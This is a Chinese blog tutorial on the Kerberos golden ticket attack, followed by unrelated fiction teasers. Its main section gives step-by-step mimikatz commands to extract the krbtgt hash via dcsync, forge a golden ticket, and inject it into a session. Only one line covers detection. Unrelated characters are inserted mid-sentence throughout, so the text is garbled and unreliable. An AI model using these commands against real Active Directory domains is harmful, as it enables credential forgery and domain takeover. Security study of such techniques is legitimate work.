域滲透系列--黃金票據(jù)

0x01 黃金票據(jù)原理

在kerberos協(xié)議身份請求認(rèn)證中(如下圖)堂鲤,不進(jìn)行第一步AS-REQ和第二步AS-REP兩個環(huán)節(jié)請求,利用偽造的ticket作為TGS-REQ的一部分發(fā)送到域控以獲取service ticket這一過程忍啸。黃金票據(jù)是由域kerberos賬號加密和簽名(krbtgt 域賬戶的NTLM Hash 加密的Session-key as、 Client-info迈勋、timestamp)并且可以被域中的 KDC 服務(wù)解密胆描。

krbtgt:KDC 服務(wù)使用的賬號瘫想,屬于 Domain Admins 組成員,可以用來生成訪問服務(wù)器的票據(jù)

golden ticket.png
0x02 GoldenTicket制作
  • 域名
  • 域SID
  • KRBTGT NTLM或AES256
  • 用來偽造的用戶名

1)獲取域SID
whoami /user
紅框里的是SID昌讲,外邊的是RID国夜,所以域SID就是S-1-5-21-16652XXXXXX-XXXXXXXXX-3128466792

sid.png

2)獲取krbtgt hash
在域控上執(zhí)行mimikatz提取krbtgt hash
mimikatz lsadump::dcsync /user:krbtgt /domain:DOMAIN_NAME

lsadump.png

3)生成黃金票據(jù)
在客戶機(jī)上執(zhí)行mimikatz
mimikatz # kerberos::golden /admin:admin111 /domain:DOMAIN_NAME /sid:S-1-5-21-XXXXXXXX-XXXXXXXX-3128466792 /krbtgt:NTLM_HASH/ticket:goldticket.kirbi

golden.png

4)清空kerberos原有票據(jù)并導(dǎo)入黃金票據(jù)
mimikatz # kerberos::purge
mimikatz # kerberos::ptt goldticket.kirbi
查詢TGT是否導(dǎo)入成功
mimikatz # kerberos::tgt

注入TGT.png

圖片.png

0x03 黃金票據(jù)檢測和防御

通過查看DC事件日志eventID 4769 - 服務(wù)票證請求判斷是否可能遭到goldenticket的攻擊。


detect.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末短绸,一起剝皮案震驚了整個濱河市车吹,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌醋闭,老刑警劉巖窄驹,帶你破解...
    沈念sama閱讀 222,183評論 6 516
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異证逻,居然都是意外死亡乐埠,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,850評論 3 399
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來饮戳,“玉大人,你說我怎么就攤上這事洞拨〕豆蓿” “怎么了?”我有些...
    開封第一講書人閱讀 168,766評論 0 361
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵烦衣,是天一觀的道長歹河。 經(jīng)常有香客問我,道長花吟,這世上最難降的妖魔是什么秸歧? 我笑而不...
    開封第一講書人閱讀 59,854評論 1 299
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮衅澈,結(jié)果婚禮上键菱,老公的妹妹穿的比我還像新娘。我一直安慰自己今布,他們只是感情好经备,可當(dāng)我...
    茶點故事閱讀 68,871評論 6 398
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著部默,像睡著了一般侵蒙。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上傅蹂,一...
    開封第一講書人閱讀 52,457評論 1 311
  • 城市分裂傳說
    那天纷闺,我揣著相機(jī)與錄音,去河邊找鬼份蝴。 笑死犁功,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的搞乏。 我是一名探鬼主播波桩,決...
    沈念sama閱讀 40,999評論 3 422
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼请敦!你這毒婦竟也來了镐躲?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,914評論 0 277
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤侍筛,失蹤者是張志新(化名)和其女友劉穎萤皂,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體匣椰,經(jīng)...
    沈念sama閱讀 46,465評論 1 319
  • ?護(hù)林員之死
    正文 獨居荒郊野嶺守林人離奇死亡裆熙,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,543評論 3 342
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片入录。...
    茶點故事閱讀 40,675評論 1 353
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡蛤奥,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出僚稿,到底是詐尸還是另有隱情凡桥,我是刑警寧澤,帶...
    沈念sama閱讀 36,354評論 5 351
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布蚀同,位于F島的核電站缅刽,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏蠢络。R本人自食惡果不足惜衰猛,卻給世界環(huán)境...
    茶點故事閱讀 42,029評論 3 335
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望刹孔。 院中可真熱鬧啡省,春花似錦、人聲如沸髓霞。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,514評論 0 25
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽酸茴。三九已至分预,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間薪捍,已是汗流浹背笼痹。 一陣腳步聲響...
    開封第一講書人閱讀 33,616評論 1 274
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留酪穿,地道東北人凳干。 一個月前我還...
    沈念sama閱讀 49,091評論 3 378
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像被济,于是被迫代替她去往敵國和親救赐。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,685評論 2 360

推薦閱讀更多精彩內(nèi)容

  • 票據(jù)傳遞攻擊 這里介紹域內(nèi)常用的兩種攻擊方式:黃金票據(jù)Golden ticket只磷、白銀票據(jù)SILVER TICKE...
    LMcream閱讀 32,647評論 0 19
  • 前言 在進(jìn)入內(nèi)網(wǎng)進(jìn)行滲透橫向過程中经磅,有時候會遇到域環(huán)境。學(xué)習(xí)整理下域環(huán)境中權(quán)限維持相關(guān)的技術(shù)钮追。本次實驗環(huán)境:win...
    Tide_諾言閱讀 2,220評論 1 4
  • 前言 在橫向滲透中预厌,利用Ticket票據(jù)進(jìn)行橫向常常用在域環(huán)境里。常見的有三種攻擊方式:ms14-068元媚、Gold...
    CSeroad閱讀 2,580評論 0 1
  • 這篇文章以由淺入深轧叽、層層深入的方式講述基于Kerberos的Windows Network Authenticat...
    readilen閱讀 3,905評論 0 2
  • 我是黑夜里大雨紛飛的人啊 1 “又到一年六月苗沧,有人笑有人哭,有人歡樂有人憂愁炭晒,有人驚喜有人失落待逞,有的覺得收獲滿滿有...
    陌忘宇閱讀 8,544評論 28 53